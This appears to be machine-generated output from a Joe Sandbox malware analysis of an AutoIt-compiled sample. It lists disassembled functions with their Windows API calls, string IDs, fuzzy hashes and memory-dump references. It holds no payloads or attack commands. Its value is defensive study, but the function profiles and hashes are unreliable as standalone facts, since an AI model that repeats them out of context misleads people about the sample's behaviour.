                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                                  • String ID: static
                                                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                                                  • Opcode ID: a58aa3d9b34e28161988b73f4425f5a2f153c9cccacb9bf244e4ea52a5d5eeb9
                                                                                                                                                  • Instruction ID: 2d3b51bd160836bbe509ed28ce551c3d6810f883301796d632085237014b4062
                                                                                                                                                  • Opcode Fuzzy Hash: a58aa3d9b34e28161988b73f4425f5a2f153c9cccacb9bf244e4ea52a5d5eeb9
                                                                                                                                                  • Instruction Fuzzy Hash: 15317E71100604AEEB109F78CC80FFB77A9FF48724F109619F9A997190DB31AD91DB60
                                                                                                                                                  Function 00C23049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00C230B8
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C230F3
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                                  • Opcode ID: c21a05fd2c8959bbf10d12bc15b5fb27437b1a42cb393bd4bc025829ac72b3ba
                                                                                                                                                  • Instruction ID: 681729dd972ffc9a21723601fcd206f286d169d5f16a81b09d2de75bb6c47f6f
                                                                                                                                                  • Opcode Fuzzy Hash: c21a05fd2c8959bbf10d12bc15b5fb27437b1a42cb393bd4bc025829ac72b3ba
                                                                                                                                                  • Instruction Fuzzy Hash: AE314831600395DBEB248F49E885BAEBBF8EF05740F144019EDA2A65A1E7B89B50CB50
                                                                                                                                                  Function 00C340B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __snwprintf.LIBCMT ref: 00C34132
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __snwprintf_memmove
                                                                                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                  • API String ID: 3506404897-2584243854
                                                                                                                                                  • Opcode ID: cf2010aede2b6f9a24b05c3c78cdeb6f8c38326f7270c7766500f0fb273fdd37
                                                                                                                                                  • Instruction ID: 48065ea4a981901acb59bc92a3954fa8f4f9ebab64ae62774545eeec26a371e7
                                                                                                                                                  • Opcode Fuzzy Hash: cf2010aede2b6f9a24b05c3c78cdeb6f8c38326f7270c7766500f0fb273fdd37
                                                                                                                                                  • Instruction Fuzzy Hash: A421C531A002186FCF14EFA4CC91EADB7B8EF54340F0444A5F905A7241DB74A985DBA1
                                                                                                                                                  Function 00C46CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?,?,?,Combobox,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00C46D86
                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C46D91
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                  • String ID: Combobox
                                                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                                                  • Opcode ID: 73501463ac318866d14ae409209fd4b0876745650bad098c7d94d27ea9918402
                                                                                                                                                  • Instruction ID: b06c32b6f4d63f802a91c61a76c33446164fd491bb5ea5e1fb2b23902de52ec5
                                                                                                                                                  • Opcode Fuzzy Hash: 73501463ac318866d14ae409209fd4b0876745650bad098c7d94d27ea9918402
                                                                                                                                                  • Instruction Fuzzy Hash: 4F11B271B00209BFEF118F54DC81FBB3BAAFB89364F104129F9289B294DA31DD508761
                                                                                                                                                  Function 00C4722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,00BC2004), ref: 00BC214F
                                                                                                                                                    • Part of subcall function 00BC2111: GetStockObject.GDI32(00000011,00000000,?,00000096,?,00BC2004,?,?,static,00C50980,?,?,?,00000096,00000096,?), ref: 00BC2163
                                                                                                                                                    • Part of subcall function 00BC2111: SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,00BC2004,?,?,static,00C50980,?,?,?,00000096,00000096), ref: 00BC216D
                                                                                                                                                  • GetWindowRect.USER32(00000000,?,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00C47296
                                                                                                                                                  • GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00C472B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                  • String ID: static
                                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                                  • Opcode ID: b5539f9a3b1fc75bd63f371fb9e11bfdfca23b91380afe4b6c2047c69e8b91a5
                                                                                                                                                  • Instruction ID: 4d6d3d253c30401101e56bcbfb21d93cb5c26e9e7745052b9fa2d16c840c2ec5
                                                                                                                                                  • Opcode Fuzzy Hash: b5539f9a3b1fc75bd63f371fb9e11bfdfca23b91380afe4b6c2047c69e8b91a5
                                                                                                                                                  • Instruction Fuzzy Hash: EB21367261420AAFDB14DFA8CC45AEA7BA8FB08314F104618FD55E3240E774E8909B50
                                                                                                                                                  Function 00C46F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 00C46FC7
                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C46FD6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                                                  • String ID: edit
                                                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                                                  • Opcode ID: 69dcda03358f194075a2dd59dcfea79f482b9fa414e06a74d8502180aabe344c
                                                                                                                                                  • Instruction ID: e03324061d5a304411527b49dae390d88eb3222035809042ec0f3821ae729c29
                                                                                                                                                  • Opcode Fuzzy Hash: 69dcda03358f194075a2dd59dcfea79f482b9fa414e06a74d8502180aabe344c
                                                                                                                                                  • Instruction Fuzzy Hash: 09115E71500204ABFB108EA4EC84FAA3B69FB06364F604714F9B4921D4C731DC959761
                                                                                                                                                  Function 00C23156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00C231C9
                                                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C231E8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                                  • Opcode ID: b83582eb3d8cf82cf071bce26f46043259073f2e751aea832bba91c828d4970d
                                                                                                                                                  • Instruction ID: d239e8a1736bdf865b618b5de2d1b8e6051db239a4e955abb9cf93b6a722123d
                                                                                                                                                  • Opcode Fuzzy Hash: b83582eb3d8cf82cf071bce26f46043259073f2e751aea832bba91c828d4970d
                                                                                                                                                  • Instruction Fuzzy Hash: 4B110432A002B4ABDB20DB98EC45B9D77B8AB05710F140161E825A76E0E778EF15CB95
                                                                                                                                                  Function 00C328A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00C3202F,?,?,?), ref: 00C328F8
                                                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C32921
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                                                  • String ID: <local>
                                                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                                                  • Opcode ID: b6d7559b175f13c13710428bd7f25d72653fc7d616f55f265e520f014c5add9f
                                                                                                                                                  • Instruction ID: 76ed31ad2b27683f6013687705ec7f058093d1eff497186ac64b5b985e131970
                                                                                                                                                  • Opcode Fuzzy Hash: b6d7559b175f13c13710428bd7f25d72653fc7d616f55f265e520f014c5add9f
                                                                                                                                                  • Instruction Fuzzy Hash: F011E071511325BAEF248F528C88FFBFBACFF05761F10812AF91596080E3706990D6E1
                                                                                                                                                  Function 00C38475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C386E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00C3849D,?,00000000,?,?), ref: 00C386F7
                                                                                                                                                  • #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C384A0
                                                                                                                                                  • #15.WSOCK32(00000000,?,00000000), ref: 00C384DD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide
                                                                                                                                                  • String ID: 255.255.255.255
                                                                                                                                                  • API String ID: 626452242-2422070025
                                                                                                                                                  • Opcode ID: fb938ef24ee360e242919b09571b64856039b27977a2db39439e7bf111fbd7b7
                                                                                                                                                  • Instruction ID: 0f3cdd7bcb55e48e12561f5098997e226a8902f78eb678fd3c1509df543a3ba3
                                                                                                                                                  • Opcode Fuzzy Hash: fb938ef24ee360e242919b09571b64856039b27977a2db39439e7bf111fbd7b7
                                                                                                                                                  • Instruction Fuzzy Hash: 4011E13520030AABCB10AF64CC52FEEB374FF04320F20851AFA25A72C1DB31A844DAA5
                                                                                                                                                  Function 00C199BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                    • Part of subcall function 00C1B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C1B7BD
                                                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?,?,?,ListBox,?,?,ComboBox), ref: 00C19A2B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 372448540-1403004172
                                                                                                                                                  • Opcode ID: b55f5d7ffe9f2b96ab418a67837cbbc0e58f28f44532e30a41ca2f8a89ffb267
                                                                                                                                                  • Instruction ID: f5ad9259aeabaa6e7d5c382d0951ce47909bff5f09c02c1e0e82c69fa48f1176
                                                                                                                                                  • Opcode Fuzzy Hash: b55f5d7ffe9f2b96ab418a67837cbbc0e58f28f44532e30a41ca2f8a89ffb267
                                                                                                                                                  • Instruction Fuzzy Hash: A801F571A41214AB8B14EBA8CC61DFEB3A9EF52320B140A5AF876573C1EE305948A660
                                                                                                                                                  Function 00C2934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __fread_nolock_memmove
                                                                                                                                                  • String ID: EA06
                                                                                                                                                  • API String ID: 1988441806-3962188686
                                                                                                                                                  • Opcode ID: 4f5af89b605be0b94b3d47f2dccd1fbed9a280931065d952db4436aa64616b14
                                                                                                                                                  • Instruction ID: 0beb8398ca1c0e3a0e3179d1e56c6750a57b84f2823e830a593a41edbbb0f938
                                                                                                                                                  • Opcode Fuzzy Hash: 4f5af89b605be0b94b3d47f2dccd1fbed9a280931065d952db4436aa64616b14
                                                                                                                                                  • Instruction Fuzzy Hash: 2201F9728042587EDB28C6A9C856EFE7BF8DB01301F00429AF552D2581E574E6048760
                                                                                                                                                  Function 00C198B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                    • Part of subcall function 00C1B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C1B7BD
                                                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?,?,?,ListBox,?,?,ComboBox), ref: 00C19923
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 372448540-1403004172
                                                                                                                                                  • Opcode ID: bf5fb2ba7d403c979910828e3329f6936acd657b40d58ee214ace078a7e1c31d
                                                                                                                                                  • Instruction ID: 9badcaeaecd50a0218a99f03c309640a30b669816f43c90c288b0d2cf447744b
                                                                                                                                                  • Opcode Fuzzy Hash: bf5fb2ba7d403c979910828e3329f6936acd657b40d58ee214ace078a7e1c31d
                                                                                                                                                  • Instruction Fuzzy Hash: 0101F771A411047BCB14EBA4C962EFFB3E8DF52300F14006AB815672C1EA205F48A6B1
                                                                                                                                                  Function 00C1993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                    • Part of subcall function 00C1B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C1B7BD
                                                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000,?,?,ListBox,?,?,ComboBox), ref: 00C199A6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassMessageNameSend_memmove
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 372448540-1403004172
                                                                                                                                                  • Opcode ID: 2ec4432e7b5eb2c2e4769accc01c21459d21d455db5120be87131f1f9f911f9a
                                                                                                                                                  • Instruction ID: 75f57b824d0a3afd9d57550e7288285d938b945d6847ee9f10c7fd2a5e709c78
                                                                                                                                                  • Opcode Fuzzy Hash: 2ec4432e7b5eb2c2e4769accc01c21459d21d455db5120be87131f1f9f911f9a
                                                                                                                                                  • Instruction Fuzzy Hash: FF01DB72A5110477CB14EBA4CA12EFFB3EDDF12340F14005ABC5AB3381EA245F48A6B1
                                                                                                                                                  Function 00C254E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassName_wcscmp
                                                                                                                                                  • String ID: #32770
                                                                                                                                                  • API String ID: 2292705959-463685578
                                                                                                                                                  • Opcode ID: 5fdf2a60f65eddfa1565cdea355af0f3b8ce0c9b4ce7319f43ec5f99568bec00
                                                                                                                                                  • Instruction ID: 46b4ce558e737c5b828badecf83265709a531463a59ec85d99448105b01263ed
                                                                                                                                                  • Opcode Fuzzy Hash: 5fdf2a60f65eddfa1565cdea355af0f3b8ce0c9b4ce7319f43ec5f99568bec00
                                                                                                                                                  • Instruction Fuzzy Hash: DAE09B7650022957D7109659AC49F9BF7ECDB55761F000166B904D7051DA709E4587D0
                                                                                                                                                  Function 00C18892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C188A0
                                                                                                                                                    • Part of subcall function 00BE3588: _doexit.LIBCMT ref: 00BE3592
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
